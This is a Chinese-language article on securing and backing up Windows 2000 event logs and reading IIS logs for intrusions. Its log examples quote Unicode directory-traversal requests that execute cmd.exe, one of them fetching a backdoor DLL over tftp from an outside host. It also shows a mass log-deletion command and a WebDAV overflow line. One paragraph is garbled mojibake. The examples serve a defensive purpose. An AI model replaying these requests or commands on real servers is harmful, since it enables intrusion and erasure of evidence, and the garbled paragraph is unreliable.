Windows“黑匣子”的保護

　　Windows系統以它的易用性倍受網管員的青睞，國內相當部分的大型網站都是用Windows 2000/XP系統建立的。Windows系統使用的人多了，研究它安全的人也多了。詿宋乙?嶁巖幌巒?苊牽?淙荒悴股狹慫?械陌踩?茍。??撬?種?佬碌?a target='_blank' class='article'>漏洞何時又會被發現呢？所以也應該做好系統日志的保護工作。

　　作為黑客，他們也是最關心系統日志的，一旦他們入侵成功，要做的第一件事就是刪除你的日志文件，使你在被入侵后無法追蹤黑客行為，以及檢查黑客所做的操作行為。日志文件就像飛機中的“黑匣子”一樣重要，因為里面保存著黑客入侵行為的所有罪證。

　　日志的移位與保護

　　Windows 2000的系統日志文件包括：應用程序日志、安全日志、系統日志、DNS服務日志，以及FTP連接日志和HTTPD日志等。在默認情況下日志文件大小為512KB，日志保存的默認的位置如下：

　　安全日志文件：systemroot＼system32＼config ＼SecEvent.EVT

　　系統日志文件：systemroot＼system32＼config ＼SysEvent.EVT

　　應用程序日志文件：systemroot＼system32＼config ＼AppEvent.EVT

　　FTP連接日志和HTTPD事務日志：systemroot ＼system32＼LogFiles＼，下面還有子文件夾，分別對應該FTP和Web服務的日志，其對應的后綴名為.Log。

　　在此筆者把系統默認為.EVT擴展名的日志文件統稱為事件日志，筆者看了好多文章介紹對事件日志移位能做到很好的保護。移位雖是一種保護方法，但只要在命令行輸入dir c:＼*.evt/s（如系統安裝在D盤，則盤符為D），一下就可查找到事件日志位置。日志移位要通過修改注冊表來完成，我們找到注冊表HKEY_LOCAL_MACHINE＼SYSTEM＼ CurrentControlSet＼Services＼Eventlog位置，下面的Application、Security、System幾個子鍵，分別對應“應用程序日志”、“安全日志”、“系統日志”。如何修改注冊表，下面我們來看看Application子鍵:

　　File項就是“應用程序日志”文件存放的位置，把此鍵值改為我們要存放日志文件的文件夾，然后再把systemroot＼system32＼config＼appevent.evt文件拷貝到此文件夾，再重啟機器。在此介紹移位的目的是為了充分利用Windows 2000在NTFS格式下的“安全”屬性，如果不移位也無法對文件進行安全設置操作，右擊移位后的文件夾選擇“屬性”，進入“安全”選項卡，不選擇“允許將來自父系的可繼承權限傳播給該對象”，添加“System”組，分別給Everyone組“讀取”權限，System組選擇除“完全控制”和“修改”的權限。然后再將系統默認的日志文件512KB大小改為你所想要的大小，如20MB。

　　進行了上面的設置后，再直接通過Del C:＼*.Evt/s/q來刪除是刪不掉的；對系統正在使用的記錄文件在命令行形式中用上面的命令也是拒絕操作的。

　　日志文件的備份

　　基于WMI技術的日志備份腳本

　　WMI（Windows Management Instrumentation）技術是微軟提供的Windows下的系統管理工具，基于WMI開發的腳本均可在Windows 2000/NT上成功運行。微軟提供了一個腳本，利用WMI將日志文件大小設為25MB，并允許日志自動覆蓋14天前的日志。

　　我們只需把該腳本保存為.vbs擴展名的文件就可以使用，我們還可以修改上面的腳本來備份日志文件，筆者在此建議，在備份日志時一定將EVT的后綴名改為其他后綴保存（如.C），目的是讓攻擊者不易找到。

　　通過dumpel工具的備份

　　可用微軟Resource Kit工具箱中的dumpel.exe工具備份日志文件，其格式為：

　　dumpel -f file [-s ＼server] [-l log [-m source]] [-e n1 n2 n3..] [-r] [-t] [-dx]


　　-s ＼server 輸出遠程計算機日志，如果是本地，這個可以省略。

　　-f filename 輸出日志的位置和文件名。

　　-l log log 可選為System，Security，Application,可能還有別的如DNS等。

　　如要把目標服務器Server上的系統日志轉存為Systemlog.log可以用如下格式：

　　dumpel ＼server -l system -f Systemlog.log
　　如果利用計劃任務還可以實現定期備份系統日志。

　　Microsoft的IIS 5自公布到現在，被黑客利用的漏洞是很多的，像.ida/.idq、unicode、WebDavx3和一些未知的漏洞，我們備份日志的目的就是為了分析黑客入侵的行為，對于沒有打好補丁包的系統被黑客成功入侵的日志記錄分別對應如下。

　　unicode漏洞入侵日志記錄

　　我們打開IIS5的Web服務的日志文件,日志文件默認位置在systemroot＼system32＼LogFiles＼文件夾下，如圖2所示是一個典型的Unicode漏洞入侵行為的日志記錄，對于正常的Web訪問，是通過80端口用GET命令獲取Web數據，但通過非法的字符編碼可繞過字符驗證而得到不應該得到的信息。但補上相應的補丁可堵上此洞。

　　如通過下面的編碼查看目標機的目錄文件：

　　GET /_vti_bin/..5c../..5c../..5c../winnt/system32/cmd.exe /c+dir 200


　　則日志中會記錄下此訪問行為：

　　2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
　　/_vti_bin/..5c../..5c../..5c../winnt/system32/cmd.exe
　　/c+dir 200 -


　　然而我們的日志中記錄的一清二楚，是來自192.168.0.1的攻擊者查看我們的目錄。而下面一行是　　向我們的機器傳送后門程序的記錄：

　　2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
　　/_vti_bin/..5c../..5c../..5c../winnt/system32/cmd.exe
　　/c+tftp20-i2061.48.10.12920GET20cool.dll20c:＼httpodbc.dll
　　502 -


　　WebDavx3遠程溢出日志記錄

　　最近在黑客界有名的Wevdavx3漏洞是應用最廣泛的，連打了最新SP3補丁的系統也不放過。如果系統遭受了此遠程溢出的攻擊行為，則日志記錄如下所示：

　　2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
　　/AAAAA……


　　就表示我們的Web服務受到了來自192.168.0.218的攻擊,并鎖定(即關閉)了WEB服務。后面的一些亂碼字符是在溢出攻擊時使用的偏移位猜過程。

　　上面都記錄了入侵行為的IP地址，此IP地址并不能排除是攻擊者使用了跳板，也就是說此IP很可能是“肉雞”而不是攻擊者的IP，但再查看其他日志文件，還是有可能追查出攻擊者的位置。

　　不過筆者寫到最后，還是想說一句，最好還是安裝一個防火墻來記錄和阻止黑客行為。

原文轉自：http://www.kjueaiud.com